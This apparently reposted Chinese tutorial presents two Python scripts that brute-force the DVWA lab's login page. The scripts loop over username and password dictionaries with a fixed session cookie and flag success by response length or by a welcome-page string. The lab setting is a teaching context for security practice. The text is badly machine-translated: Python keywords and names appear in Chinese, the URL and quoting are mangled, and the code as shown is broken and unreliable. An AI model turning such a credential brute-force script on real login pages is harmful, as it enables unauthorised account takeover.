用python破解密码,python密码爆破脚本

用python破解密码,python密码爆破脚本,Python破解网站登录密码脚本

这篇文章主要为大家介绍一个简单的计算机编程语言暴力破解网站登录密码脚本,文中的过程讲解详细,对我们学习计算机编程语言有一定的帮助,感兴趣的可以学习一下

目录

关键代码解释完整代码方法一运行结果方法二运行结果测试靶机为DVWA,适合DVWA暴力破解模块的低的和中等等级

关键代码解释

全球资源定位器(统一资源定位器)指定全球资源定位器(统一资源定位器)地址

URL=' http://192。168 .171 .2/dvwa/vulnerabilities/brute/'

页眉设置请求头

header={

用户代理:' Mozilla/5.0(Windows NT 10.0;WOW64rv:46.0)壁虎/20100101火狐/46.0 ',

cookie ':' security=medium;PHPSESSID=geo 7 GB 3 EHF 5 gfnbhrvuqu 545 I 7 '

}

有效载荷设置请求参数

有效负载={ '用户名:用户名,'密码:密码,'登录':'登录' }

这一行的作用是作一次得到请求,响应信息被变量反应接收

Response=requests.get(url,params=payload,headers=header)

这两行代码循环遍历账号和密码字典文件,之后给他们做笛卡尔积循环暴力破解

这种方式和打嗝的干扰者模块的集束炸弹攻击方式一样

对于打开的管理员(' C:\\用户\ \管理员\ \文档\ \字典\\账号. txt’):

对于打开(' C:\ \用户\ \管理员\ \文档\ \字典\\密码. txt’):

然后把循环结果存放到战斗支援车文件里,用逗号分割数据

响应。状态_代码是响应的超文本传送协议(超文本传输协议的缩写)状态码,len(Response.content)是超文本传送协议(超文本传输协议的缩写)响应报文的长度

result=str(响应。status _ code)','用户名',' \

密码','字符串(len(Response.content))

f .写(结果\n ')

完整代码

方法一

登陆成功的和失败返回数据不同,所以数据包长度也不同。包长度与其他不同的数据,可能就是正确的账号密码。

导入请求

URL=' http://192。168 .171 .2/dvwa/vulnerabilities/brute/'

# proxy={ ' http ':' http://127。0 .0 .1:8080 ' } #代理设置,方便打嗝抓包查看

header={

用户代理:' Mozilla/5.0(Windows NT 10.0;WOW64rv:46.0)壁虎/20100101火狐/46.0 ',

cookie ':' security=medium;PHPSESSID=BDI 0 AK 5 MQ bud 69 nrnejgf 8 q 00 u '

}

f=打开(' result.csv ',' w ')

f.write('状态码' ',' '用户名' ',' '密码' ',' '包长度\n ')

对于打开的管理员(' C:\\用户\ \管理员\ \文档\ \字典\\账号. txt’):

对于打开(' C:\ \用户\ \管理员\ \文档\ \字典\\密码. txt’):

username=admin.strip()

password=line.strip()

有效负载={ '用户名:用户名,'密码:密码,'登录':'登录' }

Response=requests.get(url,params=payload,headers=header)

result=str(响应。status _ code)','用户名',' \

密码','字符串(len(Response.content))

f .写(结果\n ')

打印(' \n完成)

运行结果

运行

这就是脚本发送的数据包

查看结果

查看包长度与其他不同的数据,登录测试

方法二

这个方法是根据登陆成功的返回特征来判断是否为正确的账号密码,然后把正确的账号密码输出到屏幕和文本文件(文本文件)文件里

主要改动在第17到20行

导入请求

URL=' http://192。168 .171 .2/dvwa/vulnerabilities/brute/'

# proxy={ ' http ':' http://127。0 .0 .1:8080 ' } #代理设置,方便打嗝抓包查看

header={

用户代理:' Mozilla/5.0(Windows NT 10.0;WOW64rv:46.0)壁虎/20100101火狐/46.0 ',

cookie ':' security=medium;PHPSESSID=BDI 0 AK 5 MQ bud 69 nrnejgf 8 q 00 u '

}

f=打开(' result.txt ',' w ')

对于打开的管理员(' C:\\用户\ \管理员\ \文档\ \字典\\账号. txt’):

对于打开(' C:\ \用户\ \管理员\ \文档\ \字典\\密码. txt’):

username=admin.strip()

password=line.strip()

有效负载={ '用户名:用户名,'密码:密码,'登录':'登录' }

Response=requests.get(url,params=payload,headers=header)

如果不是(Response.text.find('欢迎来到密码保护区')==-1):

结果=用户名':'密码

打印(结果)

f .写(结果\n ')

打印(' \n完成)

运行结果

这篇关于Python破解网站登录密码脚本的文章到此为止。关于Python破解网站登录密码的更多信息,请搜索我们之前的文章或者继续浏览下面的相关文章。希望你以后能支持我们!

郑重声明:本文由网友发布,不代表盛行IT的观点,版权归原作者所有,仅为传播更多信息之目的,如有侵权请联系,我们将第一时间修改或删除,多谢。

留言与评论(共有 条评论)
   
验证码: